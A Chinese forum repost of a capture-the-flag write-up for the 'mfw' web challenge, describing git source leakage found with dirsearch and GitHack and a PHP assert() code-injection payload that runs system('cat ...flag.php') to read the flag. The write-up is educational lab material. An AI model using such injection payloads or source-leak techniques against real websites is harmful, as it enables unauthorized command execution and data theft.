请选择 进入手机版 | 继续访问电脑版

【攻防世界】十八 --- mfw

[复制链接]
三兄弟沙发谢洪江 发表于 2020-12-31 19:23:18 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
题目 ---- mfw

一、writeup

主页中抓包,提示flag在:?page=flag 中

这里考的不是文件包罗,在这个页面提示使用了git,考的是git源代码泄露,访问:220.249.52.134:40286/.git/

也可以使用dirsearch,下令:python3 dirsearch.py -u http://220.249.52.134:40286/ -e php

可访问的目次中没有有用的资源,使用GitHack.py 脚本导出所有的备份文件,执行:python2 GitHack.py http://220.249.52.134:42185/.git/

对得到的代码举行审计,flag.php 中不存在flag。突破口在index.php中
[code][/code]  assert() 函数可以执行下令如下所示


还可以使用其执行系统下令


  构造payload:?page=111') or system('cat template/flag.php');//,到index.php 中就酿成了:assert("strpos('templates/111') or system('cat templates/flag.php');//.php', '..') === false") or die("Detected hacking attempt!");
即可得到flag

二、知识点



  • assert() – 可以执行系统下令
  • git源码泄露

来源:https://blog.csdn.net/qq_43168364/article/details/111223200
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


专注素材教程免费分享
全国免费热线电话

18768367769

周一至周日9:00-23:00

反馈建议

27428564@qq.com 在线QQ咨询

扫描二维码关注我们

Powered by Discuz! X3.4© 2001-2013 Comsenz Inc.( 蜀ICP备2021001884号-1 )